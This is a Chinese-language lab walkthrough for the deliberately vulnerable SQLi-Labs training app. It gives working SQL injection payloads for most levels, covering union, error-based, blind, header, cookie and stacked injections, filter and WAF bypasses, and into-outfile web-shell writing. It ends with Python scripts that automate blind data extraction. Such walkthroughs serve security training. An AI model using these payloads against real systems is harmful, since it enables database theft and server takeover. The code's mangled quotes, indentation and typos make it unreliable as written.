SQLi-Labs通关文档【1-65关】

SQLi_Labs通关文档【1-65关】

less-1 基于错误的单引号字符串

Less-2 基于错误的get整型注入

Less-3 基于错误的get单引号变形字符型注入

Less-4 基于错误的GET双引号字符型注入

Less-5 双注入GET单引号字符型注入

Less-6 双注入GET双引号字符型注入

Less-7 导出文件GET字符型注入

Less-8 布尔型单引号GET盲注

Less-9 基于时间的GET单引号盲注

Less-10 基于时间的双引号盲注

Less-11 基于错误的PSOT单引号字符

Less-12 基于错误的双引号POST型字符变形注入

Less-13 POST 单引号变形双注入

Less-14 POST双引号变形双注入

Less-15 基于bool型/时间延迟单引号POST型盲注

Less-16 post方法双引号括号绕过时间盲

Less-17 基于错误的更新查询POST注入

Less-18 基于错误的用户代理，头部POST注入

Less-19 基于头部的RefererPOST报错注入

Less-20 基于错误的cookie头部POST注入

Less-21 基于错误的复杂的字符型Cookie注入

Less-22 基于错误的双引号字符型Cookie注入)

Less-23 基于错误的，过滤注释的GET型

Less-24 二次注入

Less-25 过滤了or和and

Less-26 过滤了注释和空格的注入

Less-26a 过滤了空格和注释的盲注

Less-27 过滤了union和select

Less-27a 过滤了union和select

Less-28 过滤了union和select大小写

Less-28a盲注过滤了union和select大小写

Less-29 获取-基于错误的缺乏证据的不匹配-在web应用程序前面有一个WAF。

Less-30 盲注-缺乏证据的不匹配-在web应用程序前面有一个WAF。

Less-31 盲注-缺乏证据的不匹配-在web应用程序前面有一个WAF。

Less-32 一个为危险字符添加斜线的GET - Bypass自定义过滤器

Less-33 bypass Addslashes()

Less-34 bypass Addslashes()

Less-35 GET-Bypass添加斜杠(我们不需要)整数

Less-36 GET-Bypass MySQLreal escape_string

Less-37 POST-Bypass MySQLreal escape_string

Less-38 层次化查询

Less-39 GET - Stacked Query Injection - Intiger based

Less-40 GET-BLIND - based - String - stacked

Less-41 GET - BLIND based - Intiger - Stacked

Less-42 POST - Stacked Query error based

Less-43 POST- Stacked Query error based with twist

Less-44 POST - Error based - String - Stacked -Blind

Less-45 POST - Error based - String - Stacked - Blind

Less-46 ORDER BY-Error-Numeric

Less-47 ORDER BY Clause-Error-Single quote

Less-48 ORDER BY Clause Blind based

Less-49 ORDER BY Clause Blind based

Less-50 ORDER BY Clause Blind based

Less-51 ORDER BY Clause Blind based

Less-52 ORDER BY Clause Blind based

Less - 53 ORDER BY Clause Blind based

Less-54 GET-challenge-Union-10 queries allowed-Variation 1

Less-55 GET-challenge-Union-14 queries allowed-Variation 2

Less-56 GET-challenge-Union-14 queries allowed-Variation 3

Less-57 GET-challenge-Union-14 queries allowed-Variation 4

Less-58 GET-challenge-Double Query-5 queries allowed-Variation 1

Less-59 GET-challenge-Double Query-5 queries allowed-Variation 2

Less-60 GET-challenge-Double Query-5 queries allowed-Variation 3

Less-61 GET-challenge-Double Query-5 queries allowed-Variation 4

Less-62 GET-challenge-Blind- 130 queries allowed -variation 1

Less-63 GET-challenge-Blind- 130 queries allowed -variation 2

Less-64 GET-challenge-Blind- 130 queries allowed -variation 3

Less-65 GET-challenge-Blind- 130 queries allowed -variation 4

sql-lab 复现通关（深入学习）

为了不干扰自己本机环境，sql-lab我就用的docker跑起来的，搭建也非常简单，也就两条命令

docker pull acgpiano/sqli-labs

docker run -dt –name sqli-lab -p [你要映射的端口]:80 acgpiano/sqli-labs:latest

然后在sql-lab上直接初始化数据库就好了。

这里列举一下sql基础语句

show databases; //查看数据库

use xxx; //使用某个数据库

show tables; //查看该数据库的数据表

desc xxx; //查看该数据表的结构

select * from xxx; //查找某个数据表的所有内容

select schema_name from information_schema.schemata; //猜数据库

select table_name from information_schema.tables where table_schema=’xxxxx’; //猜某数据库的数据表

Select column_name from information_schema.columns where table_name=’xxxxx’; //猜某表的所有列

left(a,b) //从左侧截取 a 的前 b 位

mid(column_name,start[,length]) //从位置start开始，截取column_name字符串的length位，与substr作用相同

substr(string, start, length) //从位置start开始，截取字符串string的length长度，与mid作用相同

ascii() //将某个字符转换成ascii码

ord() //将某个字符转换成ascii码，同ascii()

Less-1

尝试添加’注入，发现报错

1	You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

这里我们就可以直接发现报错的地方，直接将后面注释，然后使用

1	1' order by 3%23 //得到列数为3

//这里用-1是为了查询一个不存在的id,好让第一句结果为空，直接显示第二句的结果

-1' union select 1,2,group_concat(schema_name) from information_schema.schemata%23 //得到数据库名

-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema= 'security'# //得到表名

-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name= 'users'# //得到列名

-1' union select 1,username,password from users where id=3# //爆破得到数据

Less-2

在添加’之后，得到返回

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’ LIMIT 0,1’ at line 1

可以得到这个sql语句其实并没有单引号，只是用数字进行查询，例如

select * from users where id=1

所以我们也可以跟上面一样，payloads:

-1 or 1=1%23

Less-3

添加’之后，返回

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’1’’) LIMIT 0,1’ at line 1

可以得到大概的sql语句:

select * from users where id=(‘input’) LIMIT 0,1;

所以我们可以需要闭合)。

-1’) or 1=1%23

Less-4

尝试’并未发现报错，尝试”发现报错

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘“1””) LIMIT 0,1’ at line 1

可以得到大概的sql语句

select * from users where id = (“input”) LIMIT 0,1;

所以payload:

-1**”) or 1=1 %23**

其他注入语句同上，就不再一一列举了。

Less-5

尝试’发现报错

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’1’’ LIMIT 0,1’ at line 1

猜测sql语句为

select * from users where id=’input’ LIMIT 0,1;

如果尝试之前的注入方法，会发现不再会返回我们注入的信息，如果注入成功的话，页面会返回You are in…，出错的话就不会返回这个字符串，所以这里我们可以进行盲注。

使用left()

例如我们可以使用1’ and left(version(),1)=3%23这个payload进行测试，截取version()得到的最左侧的字符判断是否为3，如果为3则正常返回You are in…，否则不返回。所以我们可以利用这个一步一步爆破得到left(version(),1)=5。爆破区间可以确定在/[0-9.]/。

采用1’and length(database())=8%23对数据库名字长度进行爆破，确定数据库名字长度之后，我们可以使用database()来进行爆破数据库名，采用left(database(),1)>’a’这个payload进行测试，原理跟上述一致，看返回即可，直到截取长度与数据库名字一致为止，这里效率比较高的就是采用二分法进行盲注。

使用substr()、ascii()

也可以采用substr()、ascii()函数进行尝试:

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>80%23 //截取数据库下第一个表的第一个字符与80ascii值进行对比

找第二个字符只需要改成substr(‘xxx’,2,1)即可。
找第二个表改成limit 1,1

使用regexp()

1’ and 1=(select 1 from information_schema.columns where table_name=’users’ and column_name regexp ‘^us[a-z]’ limit 0,1;)%23
//users表中的列名是否有us**的列

使用ord()、mid()

1’ and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))= 68%23
//cast(username AS CHAR)将username转换成字符串
//IFNULL(exp1,exp2)假如expr1不为NULL，则IFNULL()的返回值为expr1; 否则其返回值为expr2。IFNULL()的返回值是数字或是字符串，具体情况取决于其所使用的语境。
//ord前文提过

使用报错注入

推荐一篇超详细的讲解报错注入的文章

Mysql报错注入原理分析(count()、rand()、group by)

超链接：https://www.cnblogs.com/xdans/p/5412468.html

1’ union Select 1,count(),concat(0x3a,0x3a,(select user()),0
x3a,0x3a,floor(rand(0)2))a from information_schema.columns group by a–+**

1’ union select 1,count(*) ,concat((select user()),floor(rand(0)*2))x from security.users group by x#

1’ union select (!(select * from (select user())x) - ~0),2,3 –+

1’ and extractvalue(1,concat(0x7e,(select @@version),0x7e)) –+

1’ and updatexml(1,concat(0x7e,(select @@version),0x7e),1) –+

1’ union select 1,2,3 from (select NAME_CONST(version(),1), NAME_CONST(version(),1))x –+

使用延时注入

benchmark 是Mysql的一个内置函数,其作用是来测试一些函数的执行速度。benchmark() 中带有两个参数，第一个是执行的次数，第二个是要执行的函数或者是表达式

1’and If(ascii(substr(database(),1,1))=115,1,sleep(5))–+

1’UNION SELECT (IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,ENCODE(‘MSG’,’by 5 seconds’)),null)),2,3 FROM (select database() as current) as tb1**–+**

Less-6

没有回显，可以使用布尔盲注

1” and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100**–+**

可以发现>100有回显，小于就没有，也可以用报错注入…

这里就是把Less-5 中的’改成”就行了

Less-7

使用文件导出

1’))UNION SELECT 1,2,3 into outfile “c:\wamp\www\sqlli b\Less-7\uuu.txt”%23

1’))UNION SELECT 1,2,’‘ into outfile “c:\wamp\www\sqllib\Less-7\yijuhua.php”–+

Less-8

可以使用时间盲注，也可以用 bool 盲注

1’ and If(ascii(substr(database(),1,1))>115,1,sleep(5))–+

Less-9

同 Less-8 可以使用时间盲注

1’ and If(ascii(substr(database(),1,1))>115,1,sleep(5))–+

Less-10

1**” and If(ascii(substr(database(),1,1))>115,1,sleep(5))–+**

Less-11

报错注入，少一列就行了

1’ union Select count(*),concat(0x3a,0x3a,(select group_concat(schema_name) from information_schema.schemata),0x3a,0x3a,floor(rand(0)*2))a from information_schema.schemata group by a#

1’ union select count(*),concat((select user()),floor(rand(0)*2))x from information_schema.columns group by x#

Less-12

1”) union Select count(*),concat(0x3a,0x3a,(select group_concat(schema_name) from information_schema.schemata),0x3a,0x3a,floor(rand(0)*2))a from information_schema.schemata group by a#

1”) union select count(*),concat((select user()),floor(rand(0)*2))x from information_schema.columns group by x#

Less-13

1’) or 1=1#

成功登录，报错注入成功但是不回显，可以考虑盲注

1’) or ascii(substr((database()),1,1))>100#

Less-14

1**” or 1=1#**

成功登录，依然不能回显，尝试使用布尔盲注

1**” or left(database(),1)=’s’#**

发现可以用updatexml进行报错注入

1” and updatexml(1,concat(0x7e,(select @@version),0x7e),1)#

Less-15

1’ or 1=1#

成功登录，布尔注入或者时间盲注均可行

1’ or left(database(),1)=’s’#
admin’ and If(ascii(substr(database(),1,1))>115,1,sleep(5))#

Less-16

1**”) or 1=1#**

成功登录，布尔注入或者时间盲注均可行

1”) or left(database(),1)=’s’#
admin”) and If(ascii(substr(database(),1,1))>115,1,sleep(5))#

Less-17

update注入，username过滤了很多，有password错误回显，考虑用报错注入

1’ and updatexml(1,concat(0x7e,(select @@version),0x7e),1)#

Less-18

登录成功后，页面提示

Your IP ADDRESS is: 172.17.0.1
Your User Agent is: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0

那么有可能是 ip 或者 UA 注入，看了一下发现是个 Header 头注入，这里需要注意这是登录成功的条件下才能触发的，而且既然是insert注入，需要用’1’=’1闭合后面的 sql 语句，否则就是语法错误了

‘ and updatexml(1,concat(0x7e,(select @@version),0x7e),1) and ‘1’=’1
‘ and updatexml(1,concat(0x7e,(select @@version),0x7e),1),”1”,”1”)#

Less-19

登录成功后提示

Your IP ADDRESS is: 172.17.0.1
Your Referer is: http://localhost:8081/Less-19/

于是我们可以知道是在Referer应该有注入点，在 Referer 处同样用

‘ and updatexml(1,concat(0x7e,(select @@version),0x7e),1) and ‘1’=’1

可以注入

Less-20

cookie 注入，登录成功后修改 cookie 即可

‘ and updatexml(1,concat(0x7e,(select @@version),0x7e),1) and ‘1’=’1

Less-21

登录成功后发现 cookie 加上了 base64

YOUR COOKIE : uname = YWRtaW4=

用上面的 payload 进行 base64 编码就行了，记得=要 urlencode

JyBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBAQHZlcnNpb24pLDB4N2UpLDEpIGFuZCAnMSc9JzE%3d

Less-22

同 21 ，单引号换成双引号即可

IiBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBAQHZlcnNpb24pLDB4N2UpLDEpIGFuZCAiMSI9IjE%3d

Less-23

这里#、–+均被过滤了，但是我们可以利用or “1”=”1来闭合后面的双引号也可以达到我们的目的

-1’ and updatexml(1,concat(0x7e,(select @@version),0x7e),1) or ‘1’=’1

Less-24

这里是个二次注入，我们可以先注册一个admin’#的账号，在修改密码处我们就可以以自己的密码修改 admin 的密码了，因为修改密码处形成的 sql 语句是

UPDATE users SET passwd=”New_Pass” WHERE username =’admin’#’xxxx

这样#就注释掉了后面的 sql 语句

Less-25

题目很直接，提示直接把 or、and过滤了，但是可以用&&、||绕过

admin’||updatexml(1,concat(0x7e,(select @@version),0x7e),1)#

也可以双写绕过

0’ union select 1,2,group_concat(schema_name) from infoorrmation_schema.schemata;#

Less-25a

-1 union select 1,2,group_concat(schema_name) from infoorrmation_schema.schemata %23

Less-26

题目提示空格与注释被过滤了，可以使用%0a绕过，可以盲注也可以报错注入

0’||left(database(),1)>’s’%26%26’1’=’1
0’||updatexml(1,concat(0x7e,(Select%0a@@version),0x7e),1)||’1’=’1

Less-26a

题目提示空格与注释被过滤了，可以使用%a0绕过，报错注入不出，可以用布尔盲注

0’||’1’=’1 #探测为’
0’||left(database(),1)=’s’%26%26’1’=’1

白盒审计知道是’)
0%27)%a0union%a0select%a01,database(),2||(‘1
0%27)%a0union%a0select%a01,database(),2;%00

Less-27

题目提示union与select被过滤了，可用大小写绕过

0’||’1’=’1
0’||left(database(),1)=’s’%26%26’1’=’1

0’%0AunIon%0AselEct%0A1,group_concat(schema_name),2%0Afrom%0Ainformation_schema.schemata;%00

Less-27a

增加了”

0**”%0AunIon%0AselEct%0A1,group_concat(schema_name),2%0Afrom%0Ainformation_schema.schemata;%00**

Less-28

union select大小写均被过滤，但是select还可单独用，盲注即可

0’)||left(database(),1)>’s’;%00

Less-28a

依然可以用盲注

0’)||left((database()),1)=’s’;%00
0’)||left((selEct%0agroup_concat(schema_name)%0afrom%0Ainformation_schema.schemata),1)<’s’;%00

Less-29

利用tomcat与apache解析相同请求参数不同的特性，tomcat解析相同请求参数取第一个，而apache取第二个，如?id=1&id=2，tomcat取得1，apache取得2

?id=1&id=0’ union selEct 1,group_concat(schema_name),2 from information_schema.schemata;%23

Less-30

与 29 架构一样，原理一致只不过加了”限制

?id=1&id=0” union selEct 1,group_concat(schema_name),2 from information_schema.schemata;%23

Less-31

架构一样，多了”)

?id=1&id=0”) union selEct 1,group_concat(schema_name),2 from information_schema.schemata;%23

Less-32

注意是GBK，可以用%df进行宽字节注入

0%df%27%20or%201=1%23
0%df’ union selEct 1,group_concat(schema_name),2 from information_schema.schemata;%23

Less-33

0%df’ union selEct 1,group_concat(schema_name),2 from information_schema.schemata;%23

Less-34

uname=0%df’%20union+selEct%201,group_concat(schema_name)%20from%20information_schema.schemata%3b%23&passwd=1&submit=Submit

Less-35

0 union selEct 1,group_concat(schema_name),2 from information_schema.schemata;%23

Less-36

0%df%27%20union%20selEct%201,group_concat(schema_name),2%20from%20information_schema.schemata;%23
-1%EF%BF%BD%27union%20select%201,user(),3–+

Less-37

uname=0%df%27%20union%20selEct%20group_concat(schema_name),2%20from%20information_schema.schemata;%23&passwd=1&submit=Submit

Less-38

堆叠注入，成功创建test数据表

1’;create table test like users;%23

Less-39

1;create table test39 like users;%23

Less-40

1’);create table test40 like users;%23

Less-41

1;create table test41 like users;%23

Less-42

password处无过滤

login_user=1&login_password=1’%3bcreate+table+test43+like+users%3b%23&mysubmit=Login

Less-43

password处无过滤

login_user=1&login_password=1’)%3bcreate+table+test43+like+users%3b%23&mysubmit=Login

Less-44

login_user=1&login_password=1’%3bcreate+table+test44+like+users%3b%23&mysubmit=Login

Less-45

login_user=1&login_password=1’)%3bcreate+table+test45+like+users%3b%23&mysubmit=Login

Less-46

order by注入

username、password均为列名，所以以下需要知道列名

?order=if(1=1,username,password)
?order=null,if(1=1,username,password)
?order=(case when (1=1) then username else password end)
?order=ifnull(null, username)
?order=rand(1=1) //order by rand(1)/rand(0)两者返回不一样
?order=(select 1 regexp if(1=1,1,0x00))

将1=1换成bool盲注的语句函数即可用于获取数据

sort=rand(ascii(database(),1))=115)

时间盲注

sort=1 and if(ascii(substr(database(),1,1))=116,0,sleep(5))
sort=(select if(substring(current,1,1)=char(115),benchmatrk(5000000,md5(‘1’)),null) from (select database() as current) as tb1)

Bool 盲注

rand(ascii(left(database()),1))=115)

报错注入：

updatexml(1,if(1=1,concat(0x7e,version()),2),1)
(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))

procedure analyse 参数后注入

sort=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)

into outfile参数:

id=1 into outfield “path”

上传网马，可以在后面加上lines terminated by 16进制转码的数据

Less-47

有’，可以用报错

1’and (select count() from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()2)))**–+
1’and (select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x)–+

也可以用时间盲注

1’and If(ascii(substr(database(),1,1))=115,0,sleep (5))–+

procedure analyse 参数后注入

1’procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)–+

Less-48

1 and If(ascii(substr(database(),1,1))>115,0,sleep (5))–+
sort=rand(ascii(left(database(),1))=115)

Less-49

1’ and If(ascii(substr(database(),1,1))=115,0,sleep (5))–+
1’ and (If(ascii(substr((select username from users where id=1),1,1))=68,0,sleep(5)))–+

Less-50

堆叠注入

1;create table test50 like users;%23

Less-51

1’;create table test51 like users;%23

Less-52

1;create table test52 like users;%23

Less-53

1’;create table test53 like users;%23

Less-54

如果没有点提交按钮将会进入下面的else语句，有过滤，显然突破口在上面。如果点了提交将会setcookie，然后看到有个GET提交的id参数，然后有个更新数据库操作，这里限制了10次请求次数，否则更新数据库。

http://192.168.211.145/sqli/Less-54/index.php?id=-1%27%20union%20select%201,database(),%273 //查库
http://192.168.211.145/sqli/Less-54/index.php?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23 //查表
http://192.168.211.145/sqli/Less-54/index.php?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name=’ecimhbu7cx //查列
http://192.168.211.145/sqli/Less-54/index.php?id=-1' union select 1,group_concat(secret_NO71),3 from ecimhbu7cx%23 //查数据

Less-55

这个题限制了请求14次，不过当测试出闭合情况之后后面就一切顺利了。
先尝试闭合

http://192.168.211.145/sqli/Less-55/?id=1’%23 //错误
http://192.168.211.145/sqli/Less-55/?id=1’)%23 //错误
http://192.168.211.145/sqli/Less-55/?id=1)%23 //正确

尝试之后发现是用)闭合

http://192.168.211.145/sqli/Less-55/?id=-1) union select 1,database(),3%23

Less-56

这几关都差不多，首先也是尝试闭合

http://192.168.211.145/sqli/Less-56/index.php?id=1’)%23 //成功闭合
http://192.168.211.145/sqli/Less-56/index.php?id=-1’) union select 1,database(),3%23

Less-57

这关是双引号闭合的

http://192.168.211.145/sqli/Less-57/?id=-1" union select 1,database(),3%23

Less-58

查询之后并没有返回查询数据库当中的数据，不能使用union联合注入，但是有报错回显，可以使用报错注入。

http://192.168.211.145/sqli/Less-58/index.php?id=0' and extractvalue(1, concat(0x5c, (select database())))%23

Less-59

SQL语句：

$sql=”SELECT * FROM security.users WHERE id=$id LIMIT 0,1”;

payload：

http://192.168.211.145/sqli/Less-59/index.php?id= 1 and extractvalue(1, concat(0x5c, (select database())))%23

Less-60

http://192.168.211.145/sqli/Less-60/?id=1") and extractvalue(1, concat(0x5c, (select database())))%23

Less-61

http://192.168.211.145/sqli/Less-61/?id=1'))and extractvalue(1, concat(0x5c, (select database())))%23

Less-62

接下来几关要在130次内完成盲注。只不过有次数限制，很明显不能去爆破

http://192.168.211.145/sqli/Less-62/index.php?id=1’) and (length(database())=10)%23

写脚本跑出数据库名字：
# -- coding: UTF-8 --
import requests
global num
url = “http://192.168.211.145/sqli/Less-62/index.php?id=1')"
def check(payload):
global num
num += 1
content = requests.get(url=payload).text
print payload
if “Angelina” in content:
return 1
else:
return 0
def exp():
result = ‘’
start = 30
end = 127
for i in range(1,11):
for j in range(start,end):
tmp = (start+end)/2
#print tmp
payload = url + “and ascii(substr(database(),%d,1))>%d–+” % (i,tmp)
if (end - start ==1):
payload = url + “and ascii(substr(database(),%d,1))=%d–+” % (i,tmp)
if check(payload):
result += chr(tmp)
start = 30
end = 127
break
else:
result += chr(tmp+1)
start = 30
end =127
break
if check(payload):
start = tmp
else:
end = tmp
print result
if name == ‘main‘:
num =0
exp()
print num

跑字段的脚本

# -*- coding: UTF-8 -*-
import requests
global num
url = “http://192.168.211.145/sqli/Less-62/index.php?id=1')"
def check(payload):
global num
num += 1
content = requests.get(url=payload).text
print payload
if “Angelina” in content:
return 1
else:
return 0
def exp():
result = ‘’
start = 30
end = 127
for i in range(1,25):
for j in range(start,end):
tmp = (start+end)/2
#print tmp
payload = url + “and ascii(substr((select secret_28HE from qyzq3rflb5),%d,1))>%d–+” % (i,tmp)
if (end - start ==1):
payload = url + “and ascii(substr((select secret_28HE from qyzq3rflb5),%d,1))=%d–+” % (i,tmp)
if check(payload):
result += chr(tmp)
start = 30
end = 127
break
else:
result += chr(tmp+1)
start = 30
end =127
break
if check(payload):
start = tmp
else:
end = tmp
print result
if name == ‘main‘:
num =0
exp()
print num